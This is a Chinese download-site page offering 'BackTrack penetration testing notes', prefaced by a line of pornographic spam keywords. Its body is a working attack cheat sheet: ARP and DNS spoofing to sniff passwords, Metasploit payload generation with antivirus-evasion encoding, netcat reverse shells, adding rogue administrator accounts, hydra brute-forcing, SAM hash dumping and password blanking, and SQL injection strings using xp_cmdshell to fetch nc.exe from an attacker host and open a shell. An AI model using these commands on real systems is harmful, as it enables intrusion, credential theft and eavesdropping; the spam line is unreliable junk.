" />

国产午夜福利在线观看红一片,久久精品国产再热青青青,又硬又粗又大一区二区三区视频,中文字幕乱码免费,久久超碰97文字幕 ,中国精学生妹品射精久久

  • 紅軟基地:您身邊最放心的安全下載站!
您所在的位置:首頁 > 軟件 > 應(yīng)用軟件 > 教育學習 > BackTrack滲透測試筆記

BackTrack滲透測試筆記

軟件類型:
國產(chǎn)軟件
軟件語言:
簡體中文
軟件大。
6 MB
軟件授權(quán):
免費軟件
軟件評級:
4
更新時間:
2017-05-25
應(yīng)用平臺:
WinXP, Win7, WinAll
軟件簡介

BackTrack滲透測試筆記是一款BT5學習筆記,使用BT5的同學可以看看,不僅僅是用來破解WIFI,BT5還有更強大的功能。 體積小,但功能強大。界面非常清爽,簡單易操作。hZe紅軟基地

軟件功能

0x01.1 PTES 標準中的滲透測試階段hZe紅軟基地
0x01.1.1 前期交互階段hZe紅軟基地
0x01.1.2 情報搜集階段hZe紅軟基地
0x01.1.3 威脅建模階段hZe紅軟基地
0x01.1.4 漏洞分析階段hZe紅軟基地
0x01.1.5 滲透攻擊階段hZe紅軟基地
0x01.1.6 后滲透攻擊階段hZe紅軟基地
0x01.1.7 報告階段hZe紅軟基地
0x01.2 滲透測試類型hZe紅軟基地
0x01.2.1 白盒測試hZe紅軟基地
0x01.2.2 黑盒測試hZe紅軟基地
0x01.3 小結(jié)hZe紅軟基地
0x02 滲透環(huán)境搭建hZe紅軟基地
>hZe紅軟基地
0x03 常用信息收集hZe紅軟基地
0x03.1 被動信息收集hZe紅軟基地
0x03.2 主動信息收集hZe紅軟基地
0x03.3 針對性掃描hZe紅軟基地
0x03.4 小結(jié)hZe紅軟基地
0x04 信息收集的附屬工作hZe紅軟基地
0x04.1 基本的漏洞掃描hZe紅軟基地
0x04.2 使用 Nessus 進行掃描hZe紅軟基地
0x04.3 專用漏洞掃描器hZe紅軟基地
0x05 社會工程學攻擊hZe紅軟基地
0x05.1 針對性的釣魚攻擊hZe紅軟基地
0x05.2 web 向量攻擊hZe紅軟基地
0x05.3 SET 的其他特性hZe紅軟基地
0x05.4 小結(jié)。hZe紅軟基地

軟件說明

ping 域名/ip 測試本機到遠端主機是否聯(lián)通。hZe紅軟基地
dig 域名/ip 查看域名解析的詳細信息。hZe紅軟基地
host -l 域名 dns服務(wù)器 傳輸zone。hZe紅軟基地
掃描hZe紅軟基地
nmap:hZe紅軟基地
-sS 半開掃描TCP和SYN掃描。hZe紅軟基地
-sT 完全TCP連接掃描。hZe紅軟基地
-sU UDP掃描hZe紅軟基地
-PS syn包探測(防火墻探測)hZe紅軟基地
-PA ack包探測(防火墻探測)hZe紅軟基地
-PN 不ping。hZe紅軟基地
-n 不dns解析。hZe紅軟基地
-A -O和-sV。hZe紅軟基地
-O 操作系統(tǒng)識別。hZe紅軟基地
-sV 服務(wù)版本信息(banner)hZe紅軟基地
-p 端口掃描。hZe紅軟基地
-T 設(shè)置時間級別(0-5)hZe紅軟基地
-iL 導入掃描結(jié)果。hZe紅軟基地
-oG 輸出掃描結(jié)果。hZe紅軟基地
操作系統(tǒng)識別:hZe紅軟基地
p0f -i eth0 -U -p 開啟混雜模式。hZe紅軟基地
xprobe2 ip|域名 檢測os。hZe紅軟基地
banner獲取:hZe紅軟基地
nc ip port 檢測端口是否打開。hZe紅軟基地
telnet ip port 檢測端口是否打開。hZe紅軟基地
wget ip 下載主頁。hZe紅軟基地
cat index.html | more 顯示主頁代碼。hZe紅軟基地
q 退出。hZe紅軟基地
windows枚舉hZe紅軟基地
nmap -sS -p 139,445 ip 掃描windows。hZe紅軟基地
cd /pentest/enumeration/smb-enumhZe紅軟基地
nbtscan -f targetIP 檢測netbios。hZe紅軟基地
smbgetserverinfo -i targetIP 掃描name,os,組。hZe紅軟基地
smbdumpusers -i targetIP 列出用戶。hZe紅軟基地
smbclient -L //targetIP 列出共享。hZe紅軟基地
使用windows:hZe紅軟基地
net use \\ip\ipc$ "" /u:"" 開啟空會話。hZe紅軟基地
net view \\ip 顯示共享信息。hZe紅軟基地
smbclient:hZe紅軟基地
smbclient -L hostName -I targetIP 枚舉共享。hZe紅軟基地
smbclient -L hostName/share -U "" 用空用戶連接。hZe紅軟基地
smbclient -L hostName -I targetIP -U admin普通用戶連接。hZe紅軟基地
rpcclient:hZe紅軟基地
rpcclient targetIP -U ""打開一個空會話。hZe紅軟基地
netshareenum 枚舉共享。hZe紅軟基地
enumdomusers 枚舉用戶。hZe紅軟基地
lsaenumsid 枚舉域SID。hZe紅軟基地
queryuser RID 查詢用戶信息。hZe紅軟基地
createdomuser 創(chuàng)建用戶訪問。hZe紅軟基地
ARP欺騙:hZe紅軟基地
ettercap:hZe紅軟基地
nano /usr/local/etc/etter.conf配置文件hZe紅軟基地
Sniff > Unified sniffing > Network interface: eth0 > OK 設(shè)置抓包的網(wǎng)卡hZe紅軟基地
Hosts > Scan for hosts (do this two times)掃描網(wǎng)段的主機hZe紅軟基地
Hosts > Hosts list 顯示主機列表hZe紅軟基地
Select the default gateway > Add to Target 1 添加主機hZe紅軟基地
Select the target > Add to Target 2 添加主機hZe紅軟基地
Mitm > Arp poisoning > Sniff remote connections > OK 設(shè)置ARP攻擊hZe紅軟基地
Start > Start sniffing 開始攻擊hZe紅軟基地
dsniff -i eth0 監(jiān)聽網(wǎng)卡竊聽登錄用戶密碼hZe紅軟基地
urlsnarf -i eth0 嗅探http請求hZe紅軟基地
msgsnarf -i eth0 嗅探聊天軟件的聊天內(nèi)容hZe紅軟基地
driftnet -i eth0 網(wǎng)絡(luò)管理嗅探圖片,音頻。hZe紅軟基地
dns欺騙:hZe紅軟基地
nano /usr/local/share/ettercap/etter.dns編輯配置文件hZe紅軟基地
Plugins > Manage the plugins > dns_spoof 設(shè)置dns欺騙hZe紅軟基地
Mitm > Arp poisoning > Sniff remote connections > OK 設(shè)置ARPhZe紅軟基地
Start > Start sniffing 開始攻擊hZe紅軟基地
Exploits漏洞利用:hZe紅軟基地
cd /pentest/exploits/exploit-db 進入目錄hZe紅軟基地
cat sploitlist.txt | grep -i [exploit] 查詢需要的漏洞hZe紅軟基地
cat exploit | grep "#include"檢查運行環(huán)境hZe紅軟基地
cat sploitlist.txt | grep -i exploit | cut -d " " -f1 | xargs grep sys | cut -d ":" -f1 | sort -u只保留可以在linux下運行的代碼hZe紅軟基地
Metasploit:hZe紅軟基地
svn update 升級hZe紅軟基地
./msfweb Web接口127.0.0.1:55555。.hZe紅軟基地
./msfconsole 字符下的Console。hZe紅軟基地
help 幫助hZe紅軟基地
show <option> 顯示選項hZe紅軟基地
search <name> 搜索名字hZe紅軟基地
use <exploit name> 使用漏洞hZe紅軟基地
show options 顯示選項hZe紅軟基地
set <OPTION NAME> <option> 設(shè)置選項hZe紅軟基地
show payloads 顯示裝置hZe紅軟基地
set PAYLOAD <payload name> 設(shè)置裝置hZe紅軟基地
show options 顯示選項hZe紅軟基地
set <OPTION NAME> <option> 設(shè)置選項hZe紅軟基地
show targets 顯示目標(os版本)hZe紅軟基地
set TARGET <target number> 設(shè)置目標版本hZe紅軟基地
exploit 開始漏洞攻擊hZe紅軟基地
sessions -l 列出會話hZe紅軟基地
sessions -i <ID> 選擇會話hZe紅軟基地
sessions -k <ID> 結(jié)束會話hZe紅軟基地
<ctrl> z 把會話放到后臺hZe紅軟基地
<ctrl> c 結(jié)束會話hZe紅軟基地
jobs 列出漏洞運行工作hZe紅軟基地
jobs -K 結(jié)束一個漏洞運行工作hZe紅軟基地
show auxiliary 顯示輔助模塊hZe紅軟基地
use <auxiliary name> 使用輔助模塊hZe紅軟基地
set <OPTION NAME> <option> 設(shè)置選項hZe紅軟基地
run 運行模塊hZe紅軟基地
scanner/smb/version 掃描系統(tǒng)版本hZe紅軟基地
scanner/mssql/mssql_ping 測試mssql是否在線hZe紅軟基地
scanner/mssql/mssql_login 測試登錄(暴力或字典)hZe紅軟基地
Attacker behind firewall: bind shell正向hZe紅軟基地
Target behind firewall: reverse shell反向hZe紅軟基地
Meterpreter銜接不懂dos的可以用這個:hZe紅軟基地
db_import_nessus_nbe 加載nessus的掃描結(jié)果hZe紅軟基地
db_import_nmap_xml 加載nmap的掃描結(jié)果hZe紅軟基地
自動化攻擊流程:hZe紅軟基地
cd /pentest/exploit/framework3hZe紅軟基地
./msfconsolehZe紅軟基地
load db_sqlite3hZe紅軟基地
db_destroy pentesthZe紅軟基地
db_create pentesthZe紅軟基地
db_nmap targetIPhZe紅軟基地
db_hostshZe紅軟基地
db_serviceshZe紅軟基地
db_autopwn -t -p -ehZe紅軟基地
字符接口攻擊流程:hZe紅軟基地
./msfcli | grep -i <name>hZe紅軟基地
./msfcli <exploit or auxiliary> ShZe紅軟基地
./msfcli <exploit name> <OPTION NAME>=<option> PAYLOAD=<payload name> EhZe紅軟基地
做木馬后門等:hZe紅軟基地
./msfpayload <payload> <variable=value> <output type>hZe紅軟基地
S summary and options of payloadhZe紅軟基地
C C languagehZe紅軟基地
P PerlhZe紅軟基地
y RubyhZe紅軟基地
R Raw, allows payload to be piped into msfencode and other toolshZe紅軟基地
J JavaScripthZe紅軟基地
X Windows executablehZe紅軟基地
./msfpayload windows/shell/reverse_tcp LHOST=10.1.1.1 ChZe紅軟基地
./msfpayload windows/meterpreter/reverse_tcp LHOST=10.1.1.1 LPORT=4444 X > evil.exehZe紅軟基地
編碼處理就是做免殺:hZe紅軟基地
./msfencode <options> <variable=value>hZe紅軟基地
./msfpayload linux_ia32_bind LPORT=4444 R | ./msfencode -b '\x00′ -lhZe紅軟基地
./msfpayload linux_ia32_bind LPORT=4444 R | ./msfencode -b '\x00′ -e PexFnstenvMor -t chZe紅軟基地
入侵后在windows下添加管理員用戶:hZe紅軟基地
hostname 查看主機名hZe紅軟基地
net users 查看用戶hZe紅軟基地
net user 用戶 密碼 /add 添加用戶hZe紅軟基地
net localgroup 查看工作組hZe紅軟基地
net localgroup administrators 查看管理員組hZe紅軟基地
net localgroup administrators x /add 將用戶加入管理員組hZe紅軟基地
TFTPhZe紅軟基地
cp /pentest/windows-binaries/tools/nc.exe /tmp/傳遞到tftp上hZe紅軟基地
tftp -i 10.1.1.2 GET nc.exe下載hZe紅軟基地
netcat瑞士軍刀hZe紅軟基地
attacker: 10.1.1.1hZe紅軟基地
target: 10.1.1.2hZe紅軟基地
nc -v -z 10.1.1.2 1-1024 端口掃描hZe紅軟基地
target: nc -lvp 4444 聊天設(shè)置(服務(wù))hZe紅軟基地
attacker: nc -v 10.1.1.2 4444 聊天設(shè)置(客戶)hZe紅軟基地
target: nc -lvp 4444 > output.txt傳輸文件(接受)hZe紅軟基地
attacker: nc -v 10.1.1.2 4444 < test.txt傳輸文件(發(fā)送)hZe紅軟基地
target: nc -lvp 4444 -e cmd.exe Bind shell。hZe紅軟基地
attacker: nc -v 10.1.1.2 4444hZe紅軟基地
target:nc -lvp 4444 Reverse shell。hZe紅軟基地
attacker:nc -v 10.1.1.2 4444 -e /bin/bashhZe紅軟基地
密碼hZe紅軟基地
字典zcat /pentest/password/dictionaries/wordlist.txt.Z > wordshZe紅軟基地
cat words | wc -l顯示個數(shù)(30多萬個)hZe紅軟基地
暴力:hZe紅軟基地
hydra -l ftp -P words -v targetIP ftp 攻擊ftp。hZe紅軟基地
hydra -l muts -P words -v targetIP pop3 攻擊pop3hZe紅軟基地
hydra -P words -v targetIP snmp 攻擊snmphZe紅軟基地
攻擊microsof VPNhZe紅軟基地
nmap -p 1723 targetIPhZe紅軟基地
dos2unix wordshZe紅軟基地
cat words | thc-pptp-bruter targetIPhZe紅軟基地
WYD:hZe紅軟基地
wget -r target.com –accept=pdf 下載pdf文檔hZe紅軟基地
wyd.pl -o output.txt .target.com/hZe紅軟基地
cat output.txt | morehZe紅軟基地
SAM文件(windows下的密碼文件):hZe紅軟基地
%SYSTEMROOT%/system32/confighZe紅軟基地
%SYSTEMROOT%/repairhZe紅軟基地
備份windows的hash文件:hZe紅軟基地
./msfcli exploit/windows/dcerpc/ms03_026_dcom RHOST=targetIP PAYLOAD=windows/meterpreter/bind_tcp EhZe紅軟基地
meterpreter > upload -r /tmp/pwdump6 c:\\windows\\system32\\hZe紅軟基地
meterpreter > execute -f cmd -chZe紅軟基地
meterpreter > interact xhZe紅軟基地
C:\WINDOWS\system32> pwdump \\127.0.0.1hZe紅軟基地
john破解密碼:hZe紅軟基地
cp hash.txt /pentest/password/john-1.7.2/run/hZe紅軟基地
cd /pentest/password/john-1.7.2/run/hZe紅軟基地
./john hash.txthZe紅軟基地
彩虹表:hZe紅軟基地
rcrack *.rt -f hash.txthZe紅軟基地
本地修改密碼:hZe紅軟基地
mounthZe紅軟基地
umount /mnt/hda1hZe紅軟基地
modprobe fusehZe紅軟基地
ntfsmount /dev/hda1 /mnt/hda1hZe紅軟基地
mounthZe紅軟基地
ls -l /mnt/hda1 掛載c盤hZe紅軟基地
bkhive /mnt/sda1/WINDOWS/system32/config/system system.txthZe紅軟基地
samdump2 /mnt/sda1/WINDOWS/system32/config/sam system.txt > hash.txt 備份sam文件hZe紅軟基地
直接修改sam文件:hZe紅軟基地
chntpw /mnt/sda1/WINDOWS/system32/config/SAMhZe紅軟基地
Blank the password. *hZe紅軟基地
Do you really wish to change it? yhZe紅軟基地
Write hive files? yhZe紅軟基地
unmount /mnt/sda1hZe紅軟基地
reboothZe紅軟基地
SQL 注入hZe紅軟基地
nmap -sS -p 1521 targetIP 掃描oraclehZe紅軟基地
nmap -sS -p T:1433,U:1434 targetIP 掃描mssqlhZe紅軟基地
' or 1=1–驗證旁路hZe紅軟基地
列舉表名:hZe紅軟基地
' having 1=1–hZe紅軟基地
' group by table having 1=1–hZe紅軟基地
' group by table, table2 having 1=1–hZe紅軟基地
' group by table, table2, table3 having 1=1–hZe紅軟基地
列舉列類型:hZe紅軟基地
union select sum(column) from table –hZe紅軟基地
union select sum(column2) from table –hZe紅軟基地
添加數(shù)據(jù):hZe紅軟基地
' ; insert into table values('value','value2′,'value3′)–hZe紅軟基地
MSSQL存儲程序:hZe紅軟基地
輸出數(shù)據(jù)庫中備案信息到一個html文件,您可以查看與一個瀏覽器。hZe紅軟基地
' ; exec sp_makewebtask "c:\Inetpub\wwwroot\test.html", "select * from table" ; —.target.com/test.htmlhZe紅軟基地
運行ipconfig在瀏覽器查看信息。hZe紅軟基地
' or 1=1; exec master..xp_cmdshell ' "ipconfig" > c:\Inetpub\wwwroot\test.txt' .target.com/test.txthZe紅軟基地
上傳后門。hZe紅軟基地
' or 1=1; exec master..xp_cmdshell ' "tftp -i attackIP GET nc.exe && nc.exe attackIP 53 -e cmd.exe' ; –hZe紅軟基地
攻擊者: nc -lvp 53hZe紅軟基地
spreadfold。hZe紅軟基地

相關(guān)介紹

bt5,全稱Back Track five,是繼bt3,bt4之后的最新版。這是一個linux環(huán)境的便攜系統(tǒng),可以放到U盤或者硬盤中啟動,對本身硬盤沒有影響,無需在本地安裝。內(nèi)置大量的網(wǎng)絡(luò)安全檢測工具以及黑客破解軟件等。hZe紅軟基地

軟件截圖

BackTrack滲透測試筆記hZe紅軟基地

軟件下載地址
BackTrack滲透測試筆記
軟件推薦
下載排行

精品軟件

熱門關(guān)鍵詞

熱門軟件推薦